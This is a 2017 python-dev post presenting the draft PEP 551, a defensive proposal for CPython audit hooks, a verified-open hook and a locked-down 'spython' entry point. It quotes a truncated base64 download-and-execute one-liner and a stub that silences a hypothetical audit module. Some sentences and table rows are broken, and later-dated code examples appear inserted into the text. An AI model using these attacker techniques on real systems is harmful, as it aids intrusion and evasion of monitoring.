[Python-Dev] PEP 551: Security transparency in the Python runtime

Steve Dower steve.dower at python.org
Mon Aug 28 19:55:19 EDT 2017

Hi python-dev,

Those of you who were at the PyCon US language summit this year (or who 
saw the coverage at https://lwn.net/Articles/723823/) may recall that I 
talked briefly about the ways Python is used by attackers to gain and/or 
retain access to systems on local networks.

I present here PEP 551, which proposes the core changes needed to 
CPython to allow sysadmins (or those responsible for defending their 
networks) to gain visibility into the behaviour of Python processes on 
their systems. It has already gone before security-sig, and has had a 
few significant enhancements as a result. There was also quite a 
positive reaction on Twitter after the first posting (I now have a 
significant number of infosec people watching what I do very 
carefully... :) )

Since the PEP should be self-describing, I'll leave context to its text. 
I believe it is ready for discussion, though there are three incomplete 
sections. Firstly, the list of audit locations is not yet complete, but 
is sufficient for the purposes of discussion (I expect to spend time at 
the upcoming dev sprints arguing about these in ridiculous detail).

Second, the performance analysis has not yet been completed with 
sufficient robustness to make a concrete statement about its impact. 
Preliminary tests show negligible impact in the normal case, and the 
"opted-in" case is the user's responsibility. This also relies somewhat 
on the list of hooks being complete and the implementation having 

Third, the section on recommendations is not settled. It is hard to 
recommend approaches in what is very much an evolving field, so I am 
constantly revising parts of this to keep it all restricted to those 
things enabled by or affected by this PEP. I am *not* trying to present 
a full guide on how to prevent attackers breaching your system :)

My current implementation is available at:

The github rendered version of this file is at:

(The one on python.org will update at some point, but is a little behind 
the version in the repo.)



PEP: 551
Title: Security transparency in the Python runtime
Version: $Revision$
Last-Modified: $Date$
Author: Steve Dower <steve.dower at python.org>
Discussions-To: <security-sig at python.org>
Status: Draft
Type: Standards Track
Content-Type: text/x-rst
Created: 23-Aug-2017
Python-Version: 3.7
Post-History: 24-Aug-2017 (security-sig)


This PEP describes additions to the Python API and specific behaviors for the
CPython implementation that make actions taken by the Python runtime visible to
security and auditing tools. The goals in order of increasing importance are to
prevent malicious use of Python, to detect and report on malicious use, and most
importantly to detect attempts to bypass detection. Most of the responsibility
for implementation is required from users, who must customize and build Python
for their own environment.

We propose two small sets of public APIs to enable users to reliably build their
copy of Python without having to modify the core runtime, protecting future
maintainability. We also discuss recommendations for users to help them develop
and configure their copy of Python.


Software vulnerabilities are generally seen as bugs that enable remote or
elevated code execution. However, in our modern connected world, the more
dangerous vulnerabilities are those that enable advanced persistent threats
(APTs). APTs are achieved when an attacker is able to penetrate a network,
establish their software on one or more machines, and over time extract data or
intelligence. Some APTs may make themselves known by maliciously damaging data
(e.g., WannaCrypt) or hardware (e.g., Stuxnet). Most attempt to hide their
existence and avoid detection. APTs often use a
combination of traditional vulnerabilities, social engineering, phishing (or
spear-phishing), thorough network analysis, and an understanding of
misconfigured environments to establish themselves and do their work.

The first infected machines may not be the final target and may not require
special privileges. For example, an APT that is established as a
non-administrative user on a developer’s machine may have the ability to spread
to production machines through normal deployment channels. It is common for APTs
to persist on as many machines as possible, with sheer weight of presence making
them difficult to remove completely.

Whether an attacker is seeking to cause direct harm or hide their tracks, the
biggest barrier to detection is a lack of insight. System administrators with
large networks rely on distributed logs to understand what their machines are
doing, but logs are often filtered to show only error conditions. APTs that are
attempting to avoid detection will rarely generate errors or abnormal events.
Reviewing normal operation logs involves a significant amount of effort, though
work is underway by a number of companies to enable automatic anomaly detection
within operational logs. The tools preferred by attackers are ones that are
already installed on the target machines, since log messages from these tools
are often expected and ignored in normal use.

At this point, we are not going to spend further time discussing the specifics
of APTs or methods and mitigations that do not apply to this PEP. For further
information about the field, we recommend reading or watching the resources
listed under `Further Reading`_.

Python is a particularly interesting tool for attackers due to its 
prevalence on
server and developer machines, its ability to execute arbitrary code 
provided as
data (as opposed to native binaries), and its complete lack of internal
auditing. This allows attackers to download, decrypt, and execute 
malicious code
with a single command::

     python -c "import urllib.request, base64; 

This command currently bypasses most anti-malware scanners that rely on
recognizable code being read through a network connection or being 
written to
disk (base64 is often sufficient to bypass these checks). It also bypasses
protections such as file access control lists or permissions (no file access
occurs), approved application lists (assuming Python has been approved for other
uses), and automated auditing or logging (assuming Python is allowed to access
the internet or access another machine on the local network from which to obtain
its payload).

General consensus among the security community is that totally preventing
attacks is infeasible and defenders should assume that they will often detect
attacks only after they have succeeded. This is known as the "assume breach"
mindset. [1]_ In this scenario, protections such as sandboxing and input
validation have already failed, and the important task is detection, tracking,
and eventual removal of the malicious code. To this end, the primary feature
required from Python is security transparency: the ability to see what
operations the Python runtime is performing that may indicate anomalous or
malicious use. Preventing such use is valuable, but secondary to the need to
know that it is occurring.

To summarise the goals in order of increasing importance:

* preventing malicious use is valuable
* detecting malicious use is important
* detecting attempts to bypass detection is critical

One example of a scripting engine that has addressed these challenges is
PowerShell, which has recently been enhanced towards similar goals of
transparency and prevention. [2]_

Generally, application and system configuration will determine which events
within a scripting engine are worth logging. However, given that the value of
many log events is not recognized until after an attack is detected, it is
important to capture as much as possible and filter views rather than filtering
at the source (see the No Easy Breach video from `Further Reading`_). Events
that are always of interest include attempts to bypass auditing, attempts to
load and execute code that is not correctly signed or access-controlled, 
use of
uncommon operating system functionality such as debugging or inter-process
inspection tools, most network access and DNS resolution, and attempts 
to create
and hide files or configuration settings on the local machine.

To summarize, defenders have a need to audit specific uses of Python in 
order to
detect abnormal or malicious usage. Currently, the Python runtime does not
provide any ability to do this, which (anecdotally) has led to organizations
switching to other languages. The aim of this PEP is to enable system
administrators to deploy a security transparent copy of Python that can
integrate with their existing auditing and protection systems.

On Windows, some specific features that may be enabled by this include:

* Script Block Logging [3]_
* DeviceGuard [4]_
* AMSI [5]_
* Persistent Zone Identifiers [6]_
* Event tracing (which includes event forwarding) [7]_

On Linux, some specific features that may be integrated are:

* gnupg [8]_
* sd_journal [9]_
* OpenBSM [10]_
* syslog [11]_
* auditd [12]_
* SELinux labels [13]_
* check execute bit on imported modules

On macOS, some features that may be used with the expanded APIs are:

* OpenBSM [10]_
* syslog [11]_

Overall, the ability to enable these platform-specific features on 
machines is highly appealing to system administrators and will make Python a
more trustworthy dependency for application developers.

Overview of Changes

True security transparency is not fully achievable by Python in isolation. The
runtime can audit as many events as it likes, but unless the logs are reviewed
and analyzed there is no value. Python may impose restrictions in the name of
security, but usability may suffer. Different platforms and environments will
require different implementations of certain security features, and
organizations with the resources to fully customize their runtime should be
encouraged to do so.

The aim of these changes is to enable system administrators to integrate Python
into their existing security systems, without dictating what those systems look
like or how they should behave. We propose two API changes to enable this: an
Audit Hook and Verified Open Hook. Both are not set by default, and both require
modifications to the entry point binary to enable any functionality. For the
purposes of validation and example, we propose a new ``spython`` entry point
program that enables some basic functionality using these hooks.
**However, security-conscious organizations are expected to create their own
entry points to meet their own needs.**

Audit Hook

In order to achieve security transparency, an API is required to raise events
from within certain operations. These operations are typically deep within the
Python runtime or standard library, such as dynamic code compilation, module
imports, DNS resolution, or use of certain modules such as ``ctypes``.

The new APIs required for audit hooks are::

    # Add an auditing hook
    sys.addaudithook(hook: Callable[str, tuple]) -> None
    int PySys_AddAuditHook(int (*hook)(const char *event, PyObject *args));

    # Raise an event with all auditing hooks
    sys.audit(str, *args) -> None
    int PySys_Audit(const char *event, PyObject *args);

    # Internal API used during Py_Finalize() - not publicly accessible
    void _Py_ClearAuditHooks(void);

Hooks are added by calling ``PySys_AddAuditHook()`` from C at any time,
including before ``Py_Initialize()``, or by calling ``sys.addaudithook()`` from
Python code. Hooks are never removed or replaced, and existing hooks have an
opportunity to refuse to allow new hooks to be added (adding an audit hook is
audited, and so preexisting hooks can raise an exception to block the new
addition).

When events of interest are occurring, code can either call ``PySys_Audit()``
from C (while the GIL is held) or ``sys.audit()``. The string argument is the
name of the event, and the tuple contains arguments. A given event name should
have a fixed schema for arguments, and both arguments are considered a public
API (for a given x.y version of Python), and thus should only change between
feature releases with updated documentation.
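
As a rough illustration of the Python-level calls described above, the
following sketch registers a hook and raises a custom event. It assumes an
interpreter that provides ``sys.addaudithook()`` and ``sys.audit()`` as
proposed here (CPython 3.8 and later do). The ``demo.login`` event name and
its argument schema are hypothetical and not part of this PEP.

```python
import sys

# Events captured by the hook; a real hook would forward them to a log sink.
recorded = []


def demo_hook(event, args):
    # Hooks receive every audited event, so select the ones of interest.
    if event.startswith("demo."):
        recorded.append((event, args))


sys.addaudithook(demo_hook)

# Raise a hypothetical event: the name first, then its positional arguments.
sys.audit("demo.login", "alice", 42)
print(recorded)
```

The hook receives the event name as a string and the arguments as a tuple,
which is why a fixed schema per event name matters to hook authors.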

When an event is audited, each hook is called in the order it was added 
with the
event name and tuple. If any hook returns with an exception set, later 
hooks are
ignored and *in general* the Python runtime should terminate. This is
intentional to allow hook implementations to decide how to respond to any
particular event. The typical responses will be to log the event, abort the
operation with an exception, or to immediately terminate the process with an
operating system exit call.
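
The ordering and abort behaviour can be sketched from Python as follows. This
is only an illustration, again assuming an interpreter that provides
``sys.addaudithook()`` and ``sys.audit()``; the ``demo.forbidden`` event and
both hook functions are hypothetical.

```python
import sys

calls = []


def blocking_hook(event, args):
    # Record the event first, then abort the hypothetical operation.
    if event == "demo.forbidden":
        calls.append("blocking_hook")
        raise PermissionError("demo.forbidden is not permitted here")


def later_hook(event, args):
    if event.startswith("demo."):
        calls.append("later_hook")


sys.addaudithook(blocking_hook)  # added first, so called first
sys.addaudithook(later_hook)     # added second, so called second

try:
    sys.audit("demo.forbidden")
    aborted = False
except PermissionError:
    # The exception set by the first hook reaches the code raising the event.
    aborted = True

print(aborted, calls)
```

Because the first hook raised, the second hook never sees the event, so a
hook that must always log should be added as early as possible.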

When an event is audited but no hooks have been set, the ``audit()`` function
should include minimal overhead. Ideally, each argument is a reference to
existing data rather than a value calculated just for the auditing call.

As hooks may be Python objects, they need to be freed during ``Py_Finalize()``.
To do this, we add an internal API ``_Py_ClearAuditHooks()`` that releases any
``PyObject*`` hooks that are held, as well as any heap memory used. This is an
internal function with no public export, but it triggers an event for all audit
hooks to ensure that unexpected calls are logged.

See `Audit Hook Locations`_ for proposed audit hook points and schemas, 
and the
`Recommendations`_ section for discussion on appropriate responses.

Verified Open Hook

Most operating systems have a mechanism to distinguish between files 
that can be
executed and those that can not. For example, this may be an execute bit 
in the
permissions field, or a verified hash of the file contents to detect 
code tampering. These are an important security mechanism for preventing
execution of data or code that is not approved for a given environment.
Currently, Python has no way to integrate with these when launching 
scripts or
importing modules.

The new public API for the verified open hook is::

    # Set the handler
    int Py_SetOpenForExecuteHandler(PyObject *(*handler)(const char *narrow, const wchar_t *wide))

    # Open a file using the handler
    os.open_for_exec(pathlike)

The ``os.open_for_exec()`` function is a drop-in replacement for
``open(pathlike, 'rb')``. Its default behaviour is to open a file for raw,
binary access - any more restrictive behaviour requires the use of a custom
handler. (Aside: since ``importlib`` requires access to this function before the
``os`` module has been imported, it will be available on the ``nt``/``posix``
modules, but the intent is that other users will access it through the ``os``
module.)

A custom handler may be set by calling ``Py_SetOpenForExecuteHandler()`` from C
at any time, including before ``Py_Initialize()``. When ``open_for_exec()`` is
called with a handler set, the handler will be passed the processed narrow or
wide path, depending on platform, and its return value will be returned
directly. The returned object should be an open file-like object that supports
reading raw bytes. This is explicitly intended to allow a ``BytesIO`` instance
if the open handler has already had to read the file into memory in order to
perform whatever verification is necessary to determine whether the content is
permitted to be executed.
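
The verification logic of such a handler might look like the sketch below.
The real handler is set from C; this Python function only models the
behaviour described above. The ``APPROVED_DIGESTS`` allowlist and the
``verifying_open`` name are hypothetical, and a SHA-256 comparison stands in
for whatever verification a platform actually provides.

```python
import hashlib
import io

# Hypothetical allowlist mapping file paths to expected SHA-256 hex digests.
APPROVED_DIGESTS = {}


def verifying_open(path):
    """Return a binary file-like object for `path` if its contents are approved."""
    with open(path, "rb") as f:
        data = f.read()
    digest = hashlib.sha256(data).hexdigest()
    if APPROVED_DIGESTS.get(str(path)) != digest:
        raise PermissionError(f"{path!r} is not approved for execution")
    # Return the bytes that were verified, so the caller executes exactly
    # what was checked rather than re-reading the file from disk.
    return io.BytesIO(data)
```

Returning the in-memory copy avoids a window between the check and the use
in which the file on disk could be replaced.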

Note that these handlers can import and call the ``_io.open()`` function on
CPython without triggering themselves.

If the handler determines that the file is not suitable for execution, it should
raise an exception of its choice, as well as raising any other auditing events
or notifications.

All import and execution functionality involving code from a file will be
changed to use ``open_for_exec()`` unconditionally. It is important to note that
calls to ``compile()``, ``exec()`` and ``eval()`` do not go through this
function - an audit hook that includes the code from these calls will be added
and is the best opportunity to validate code that is read from the file. Given
the current decoupling between import and execution in Python, most imported
code will go through both ``open_for_exec()`` and the log hook for ``compile``,
and so care should be taken to avoid repeating verification steps.

.. note::
    The use of ``open_for_exec()`` by ``importlib`` is a valuable first defence,
    but should not be relied upon to prevent misuse. In particular, it is easy
    to monkeypatch ``importlib`` in order to bypass the call. Auditing hooks are
    the primary way to achieve security transparency, and are essential for
    detecting attempts to bypass other functionality.
API Availability

While all the functions added here are considered public and stable API, the
behavior of the functions is implementation specific. The descriptions here
refer to the CPython implementation, and while other implementations should
provide the functions, there is no requirement that they behave the same.

For example, ``sys.addaudithook()`` and ``sys.audit()`` should exist but may do
nothing. This allows code to make calls to ``sys.audit()`` without having to
test for existence, but it should not assume that its call will have any effect.
(Including existence tests in security-critical code allows another vector to
bypass auditing, so it is preferable that the function always exist.)

``os.open_for_exec(pathlike)`` should at a minimum always return
``_io.open(pathlike, 'rb')``. Code using the function should make no further
assumptions about what may occur, and implementations other than CPython are not
required to let developers override the behavior of this function with a hook.

Audit Hook Locations

Calls to ``sys.audit()`` or ``PySys_Audit()`` will be added to the following
operations with the schema in Table 1. Unless otherwise specified, the ability
for audit hooks to abort any listed operation should be considered part of the
rationale for including the hook.

.. csv-table:: Table 1: Audit Hooks
    :header: "API Function", "Event Name", "Arguments", "Rationale"
    :widths: 2, 2, 3, 6

    ``PySys_AddAuditHook``, ``sys.addaudithook``, "", "Detect when new audit
    hooks are being added."
    ``_PySys_ClearAuditHooks``, ``sys._clearaudithooks``, "", "Notifies hooks
    they are being cleaned up, mainly in case the event is triggered
    unexpectedly. This event cannot be aborted."
    ``Py_SetOpenForExecuteHandler``, ``setopenforexecutehandler``, "", "Detect
    any attempt to set the ``open_for_execute`` handler."
    "``compile``, ``exec``, ``eval``, ``PyAst_CompileString``,
    ", ``compile``, "``(code, filename_or_none)``", "Detect dynamic code
    compilation, where ``code`` could be a string or AST. Note that this will be
    called for regular imports of source code, including those that were opened
    with ``open_for_exec``."
    "``exec``, ``eval``, ``run_mod``", ``exec``, "``(code_object,)``", "Detect
    dynamic execution of code objects. This only occurs for explicit calls, and
    is not raised for normal function invocation."
    ``import``, ``import``, "``(module, filename, sys.path, sys.meta_path,
    sys.path_hooks)``", "Detect when modules are imported. This is raised before
    the module name is resolved to a file. All arguments other than the module
    name may be ``None`` if they are not used or available."
    ``code_new``, ``code.__new__``, "``(bytecode, filename, name)``", "Detect
    dynamic creation of code objects. This only occurs for direct instantiation,
    and is not raised for normal compilation."
    "``_ctypes.dlopen``, ``_ctypes.LoadLibrary``", ``ctypes.dlopen``, "
    ``(module_or_path,)``", "Detect when native modules are used."
    ``_ctypes._FuncPtr``, ``ctypes.dlsym``, "``(lib_object, name)``", "Collect
    information about specific symbols retrieved from native modules."
    ``_ctypes._CData``, ``ctypes.cdata``, "``(ptr_as_int,)``", "Detect when code
    is accessing arbitrary memory using ``ctypes``"
    ``id``, ``id``, "``(id_as_int,)``", "Detect when code is accessing the id of
    objects, which in CPython reveals information about memory layout."
    ``sys._getframe``, ``sys._getframe``, "``(frame_object,)``", "Detect when
    code is accessing frames directly"
    ``sys._current_frames``, ``sys._current_frames``, "", "Detect when code is
    accessing frames directly"
    ``PyEval_SetProfile``, ``sys.setprofile``, "", "Detect when code is injecting
    trace functions. Because of the implementation, exceptions raised from the
    hook will abort the operation, but will not be raised in Python code. Note
    that ``threading.setprofile`` eventually calls this function, so the event
    will be audited for each thread."
    ``PyEval_SetTrace``, ``sys.settrace``, "", "Detect when code is injecting
    trace functions. Because of the implementation, exceptions raised from the
    hook will abort the operation, but will not be raised in Python code. Note
    that ``threading.settrace`` eventually calls this function, so the event
    will be audited for each thread."
    ``_PyEval_SetAsyncGenFirstiter``, ``sys.set_async_gen_firstiter``, "", "
    Detect changes to async generator hooks."
    ``_PyEval_SetAsyncGenFinalizer``, ``sys.set_async_gen_finalizer``, "", "
    Detect changes to async generator hooks."
    ``_PyEval_SetCoroutineWrapper``, ``sys.set_coroutine_wrapper``, "", "Detect
    changes to the coroutine wrapper."
    ``Py_SetRecursionLimit``, ``sys.setrecursionlimit``, "``(new_limit,)``", "
    Detect changes to the recursion limit."
    ``_PyEval_SetSwitchInterval``, ``sys.setswitchinterval``,
    ", "Detect changes to the switching interval."
    "``socket.bind``, ``socket.connect``, ``socket.connect_ex``,
    ``socket.getaddrinfo``, ``socket.getnameinfo``, ``socket.sendmsg``,
    ``socket.sendto``", ``socket.address``, "``(address,)``", "Detect access to
    network resources. The address is unmodified from the original call."
    ``socket.__init__``, "socket()", "``(family, type, proto)``", "Detect
    creation of sockets. The arguments will be int values."
    ``socket.gethostname``, ``socket.gethostname``, "", "Detect attempts to
    retrieve the current host name."
    ``socket.sethostname``, ``socket.sethostname``, "``(name,)``", "Detect
    attempts to change the current host name. The name argument is passed as a
    bytes object."
    "``socket.gethostbyname``, ``socket.gethostbyname_ex``", "
    ``socket.gethostbyname``", "``(name,)``", "Detect host name resolution. The
    name argument is a str or bytes object."
    ``socket.gethostbyaddr``, ``socket.gethostbyaddr``, "``(address,)``", "Detect
    host resolution. The address argument is a str or bytes object."
    ``socket.getservbyname``, ``socket.getservbyname``, "``(name, protocol)``", "
    Detect service resolution. The arguments are str objects."
    ``socket.getservbyport``, ``socket.getservbyport``, "``(port, protocol)``", "
    Detect service resolution. The port argument is an int and protocol is a
    str."
    ``type.__setattr__``","``(type, attr_name, value)``","Detect monkey patching
    of types. This event is only raised when the object is an instance of
    ``type``."
    "``_PyObject_GenericSetAttr``, ``check_set_special_type_attr``,
    ``object_set_class``",``object.__setattr__``,"``(object, attr, value)``","
    Detect monkey patching of objects. This event is raised for the ``__class__``
    attribute and any attribute on ``type`` objects."
    Detect deletion of object attributes. This event is raised for any attribute
    on ``type`` objects."
    global_name)``","Detect imports and global name lookup when unpickling."

TODO - more hooks in ``_socket``, ``_ssl``, others?
* code objects
* function objects

SPython Entry Point

A new entry point binary will be added, called ``spython.exe`` on Windows and
``spythonX.Y`` on other platforms. This entry point is intended primarily as an
example, as we expect most users of this functionality to implement their own
entry point and hooks (see `Recommendations`_). It will also be used for
testing.

Source builds will build ``spython`` by default, but distributions should not
include it except as a test binary. The python.org managed binary distributions
will not include ``spython``.

**Do not accept most command-line arguments**

The ``spython`` entry point requires a script file be passed as the first
argument, and does not allow any options. This prevents arbitrary code execution
from in-memory data or non-script files (such as pickles, which can be executed
using ``-m pickle <path>``).

Options ``-B`` (do not write bytecode), ``-E`` (ignore environment variables)
and ``-s`` (no user site) are assumed.

If a file with the same full path as the process with a ``._pth`` suffix
(``spython._pth`` on Windows, ``spythonX.Y._pth`` on Linux) exists, it 
will be
used to initialize ``sys.path`` following the rules currently described `for
Windows <https://docs.python.org/3/using/windows.html#finding-modules>`_.

When built with ``Py_DEBUG``, the ``spython`` entry point will allow a ``-i``
option with no other arguments to enter into interactive mode, with audit
messages being written to standard error rather than a file. This is intended
for testing and debugging only.

**Log security events to a file**

Before initialization, ``spython`` will set an audit hook that writes events to
a local file. By default, this file is the full path of the process with a
``.log`` suffix, but may be overridden with the ``SPYTHONLOG`` environment
variable (despite such overrides being explicitly discouraged in
`Recommendations`_).

The audit hook will also abort all ``sys.addaudithook`` events, 
preventing any
other hooks from being added.
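
A Python approximation of this behaviour is sketched below. The ``spython``
hook itself is set from C before initialization; here the log path, the
``make_logging_hook`` helper and the ``demo.event`` name are hypothetical, and
the sketch assumes an interpreter providing ``sys.addaudithook()`` and
``sys.audit()``.

```python
import os
import sys
import tempfile

# Hypothetical log location; spython derives its path from the process path.
log_path = os.path.join(tempfile.mkdtemp(), "audit.log")


def make_logging_hook(log_file):
    def hook(event, args):
        if log_file.closed:
            return
        # Only the event name is written: formatting arbitrary arguments
        # could run further Python code from inside the hook.
        log_file.write(event + "\n")
        log_file.flush()
        if event == "sys.addaudithook":
            # Log first, then refuse the new hook.
            raise RuntimeError("additional audit hooks are not permitted")
    return hook


# Open the log once, up front. Opening a file inside the hook would itself
# be an audited operation and could re-enter the hook.
sys.addaudithook(make_logging_hook(open(log_path, "a", encoding="utf-8")))

intruder_events = []
try:
    sys.addaudithook(lambda event, args: intruder_events.append(event))
except RuntimeError:
    # CPython documents that a RuntimeError raised by an existing hook is
    # suppressed here; this clause is purely defensive.
    pass

sys.audit("demo.event")
```

After this runs, the second hook has never been called, while the log
contains both the refused ``sys.addaudithook`` event and ``demo.event``.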

**Restrict importable modules**

Also before initialization, ``spython`` will set an open-for-execute 
hook that
validates all files opened with ``os.open_for_exec``. This 
implementation will
require all files to have a ``.py`` suffix (thereby blocking the use of 
bytecode), and will raise a custom audit event ``spython.open_for_exec``
containing ``(filename, True_if_allowed)``.
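
The suffix check and the custom event could be modelled in Python roughly as
follows. This is a sketch of the described behaviour rather than the
``spython`` implementation, which is written in C; the ``restricted_open``
name is hypothetical and ``sys.audit()`` is assumed to be available.

```python
import sys


def restricted_open(path):
    """Open `path` for execution only if it is a ``.py`` source file."""
    allowed = str(path).endswith(".py")
    # Report the decision before acting on it, mirroring the
    # ``spython.open_for_exec`` event described above.
    sys.audit("spython.open_for_exec", str(path), allowed)
    if not allowed:
        raise OSError(f"refusing to open {path!r} for execution")
    return open(path, "rb")
```

Raising the event before the refusal means a rejected attempt still appears
in the audit log.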

On Windows, the hook will also open the file with flags that prevent any other
process from opening it with write access, which allows the hook to perform
additional validation on the contents with confidence that it will not be
modified between the check and use. Compilation will later trigger a ``compile``
event, so there is no need to read the contents now for AMSI, but other
validation mechanisms such as DeviceGuard [4]_ should be performed here.

**Restrict globals in pickles**

The ``spython`` entry point will abort all ``pickle.find_class`` events 
that use
the default implementation. Overrides will not raise audit events unless
explicitly added, and so they will continue to be allowed.
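
A hook with this effect might be sketched as below. It assumes the
interpreter raises ``pickle.find_class`` with the module and global names as
arguments (CPython 3.8 and later do) and that ``sys.addaudithook()`` is
available; the ``pickle_guard`` name is hypothetical.

```python
import collections
import pickle
import sys


def pickle_guard(event, args):
    if event == "pickle.find_class":
        module_name, global_name = args
        raise RuntimeError(f"unpickling {module_name}.{global_name} is blocked")


sys.addaudithook(pickle_guard)

# Plain containers need no global lookup, so they still load.
plain = pickle.loads(pickle.dumps([1, 2, 3]))

# An OrderedDict is pickled by reference to ``collections.OrderedDict``,
# so loading it triggers the event and the hook aborts the operation.
try:
    pickle.loads(pickle.dumps(collections.OrderedDict(a=1)))
    blocked = False
except RuntimeError:
    blocked = True

print(plain, blocked)
```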

Performance Impact


Full impact analysis still requires investigation. Preliminary testing shows
that calling ``sys.audit`` with no hooks added does not significantly affect
any existing benchmarks, though targeted microbenchmarks can observe an impact.

Performance impact using ``spython`` or with hooks added is not of interest
here, since this is considered opt-in functionality.


Recommendations

Specific recommendations are difficult to make, as the ideal configuration for
any environment will depend on the user's ability to manage, monitor, and
respond to activity on their own network. However, many of the proposals here do
not appear to be of value without deeper illustration. This section provides
recommendations using the terms **should** (or **should not**), indicating that
we consider it dangerous to ignore the advice, and **may**, indicating that
the advice ought to be considered for high value systems. The term **sysadmin**
refers to whoever is responsible for deploying Python throughout your network;
different organizations may have an alternative title for the responsible
people.
Sysadmins **should** build their own entry point, likely starting from the
``spython`` source, and directly interface with the security systems available
in their environment. The more tightly integrated, the less likely a
vulnerability will be found allowing an attacker to bypass those systems. In
particular, the entry point **should not** obtain any settings from the current
environment, such as environment variables, unless those settings are otherwise
protected from modification.

Audit messages **should not** be written to a local file. The ``spython`` entry
point does this for example and testing purposes. On production machines, tools
such as ETW [7]_ or auditd [12]_ that are intended for this purpose should be
used.

The default ``python`` entry point **should not** be deployed to production
machines, but could be given to developers to use and test Python on
non-production machines. Sysadmins **may** consider deploying a less restrictive
version of their entry point to developer machines, since any system connected
to your network is a potential target. Sysadmins **may** deploy their own entry
point as ``python`` to obscure the fact that extra auditing is being included.

Python deployments **should** be made read-only using any available platform
functionality after deployment and during use.

On platforms that support it, sysadmins **should** include signatures 
for every
file in a Python deployment, ideally verified using a private 
certificate. For
example, Windows supports embedding signatures in executable files and using
catalogs for others, and can use DeviceGuard [4]_ to validate signatures 
automatically or using an ``open_for_exec`` hook.

Sysadmins **should** log as many audited events as possible, and 
**should** copy
logs off of local machines frequently. Even if logs are not being constantly
monitored for suspicious activity, once an attack is detected it is too 
late to
enable auditing. Audit hooks **should not** attempt to preemptively filter
events, as even benign events are useful when analyzing the progress of
an attack. (Watch the "No Easy Breach" video under `Further Reading`_ for a
deeper look at this side of things.)

Most actions **should not** be aborted if they could ever occur during normal
use or if preventing them will encourage attackers to work around them. As
described earlier, awareness is a higher priority than prevention. Sysadmins
**may** audit their Python code and abort operations that are known to 
never be
used deliberately.

Audit hooks **should** write events to logs before attempting to abort. As
discussed earlier, it is more important to record malicious actions than to
prevent them.

Sysadmins **should** identify correlations between events, as a change to
correlated events may indicate misuse. For example, module imports will
typically trigger the ``import`` auditing event, followed by an
``open_for_exec`` call and usually a ``compile`` event. Attempts to bypass
auditing will often suppress some but not all of these events. So if the log
contains ``import`` events but not ``compile`` events, investigation may be
necessary.
The first audit hook **should** be set in C code before ``Py_Initialize`` is
called, and that hook **should** unconditionally abort the ``sys.addaudithook``
event. The Python interface is primarily intended for testing and development.

To prevent audit hooks being added on non-production machines, an entry point
**may** add an audit hook that aborts the ``sys.addaudithook`` event but
otherwise does nothing.

On production machines, a non-validating ``open_for_exec`` hook **may** 
be set
in C code before ``Py_Initialize`` is called. This prevents later code from
overriding the hook, however, logging the ``setopenforexecutehandler`` 
event is
useful since no code should ever need to call it. Using at least the sample
``open_for_exec`` hook implementation from ``spython`` is recommended.

Since ``importlib``'s use of ``open_for_exec`` may be easily bypassed with
monkeypatching, an audit hook **should** be used to detect attribute 
changes on
type objects.

[TODO: more good advice; less bad advice]

Rejected Ideas

Separate module for audit hooks

The proposal is to add a new module for audit hooks, hypothetically ``audit``.
This would separate the API and implementation from the ``sys`` module, and
allow naming the C functions ``PyAudit_AddHook`` and ``PyAudit_Audit`` rather
than the current variations.

Any such module would need to be a built-in module that is guaranteed to 
be present. The nature of these hooks is that they must be callable without
condition, as any conditional imports or calls provide more opportunities to
intercept and suppress or modify events.

Given its nature as one of the most core modules, the ``sys`` module is
protected against module shadowing attacks. Replacing ``sys`` with a
sufficiently functional module that the application can still run is a much
more complicated task than replacing a module with only one function of
interest. An attacker that has the ability to shadow the ``sys`` module is
already capable of running arbitrary code from files, whereas an ``audit``
module can be replaced with a single statement::

     import sys; sys.modules['audit'] = type('audit', (object,),
         {'audit': lambda *a: None, 'addhook': lambda *a: None})

Multiple layers of protection already exist for monkey patching attacks
against either ``sys`` or ``audit``, but assignments or insertions to
``sys.modules`` are not audited.

This idea is rejected because it makes substituting ``audit`` calls
throughout all callers nearly trivial.
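
To make the concern concrete, here is a small sketch of what a caller would see after such a substitution. The ``audit`` module is hypothetical (it is the rejected proposal, not an existing module), and ``shadow_audit_module`` is a name invented for this example.

```python
import sys


def shadow_audit_module():
    """Install a do-nothing stand-in for a hypothetical ``audit`` module."""
    stub = type("audit", (object,), {
        "audit": lambda *a: None,    # swallows every event
        "addhook": lambda *a: None,  # silently discards every hook
    })
    sys.modules["audit"] = stub
    # The import system consults sys.modules first, so this yields the stub.
    import audit
    return audit


recorded = []
audit = shadow_audit_module()
audit.addhook(recorded.append)        # appears to succeed, registers nothing
audit.audit("import", "some_module")  # appears to succeed, reports nothing
```

Every later ``import audit`` in the process resolves to the stub, so callers keep running without error while no event reaches any hook.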

Flag in sys.flags to indicate "secure" mode

The proposal is to add a value in ``sys.flags`` to indicate when Python is
running in a "secure" mode. This would allow applications to detect when 
features are enabled and modify their behaviour appropriately.

Currently there are no guarantees made about security by this PEP - this 
is the first time the word "secure" has been used. Security **transparency**
does not result in any changed behaviour, so there is no appropriate reason
for applications to modify their behaviour.

Both application-level APIs ``sys.audit`` and ``os.open_for_exec`` are
present and functional, regardless of whether the regular ``python`` entry
point or some alternative entry point is used. Callers cannot determine
whether any hooks have been added (except by performing side-channel
analysis), nor do they need to. The calls should be fast enough that callers
do not need to avoid them, and the sysadmin is responsible for ensuring their
added hooks are fast enough to not affect application performance.
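
From the application side this could look like the sketch below, which raises an event unconditionally and never asks whether anything is listening. It assumes ``sys.audit`` as it later shipped in CPython 3.8. The event name ``myapp.run_user_script`` and the function itself are hypothetical.

```python
import sys


def run_user_script(source: str, filename: str = "<user-script>") -> dict:
    """Run a snippet of user-supplied code, reporting it to any audit hooks."""
    # Raised unconditionally: the caller neither knows nor needs to know
    # whether a hook has been installed.
    sys.audit("myapp.run_user_script", filename)
    namespace = {}
    exec(compile(source, filename, "exec"), namespace)
    return namespace


result = run_user_script("x = 1 + 1")
```

With no hooks installed the call is close to a no-op, which is why there is nothing for the application to detect or branch on.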

The argument that this is "security by obscurity" is valid, but irrelevant.
Security by obscurity is only an issue when there are no other protective
mechanisms; obscurity as the first step in avoiding attack is strongly
recommended (see `this article
<https://danielmiessler.com/study/security-by-obscurity/>`_ for discussion).

This idea is rejected because there are no appropriate reasons for an
application to change its behaviour based on whether these APIs are in use.

Further Reading

**Redefining Malware: When Old Terms Pose New Threats**
     By Aviv Raff for SecurityWeek, 29th January 2014

     This article, and those linked by it, are high-level summaries of the
     rise of APTs and the differences from "traditional" malware.


**Anatomy of a Cyber Attack**
     By FireEye, accessed 23rd August 2017

     A summary of the techniques used by APTs, and links to a number of 


**Automated Traffic Log Analysis: A Must Have for Advanced Threat Protection**
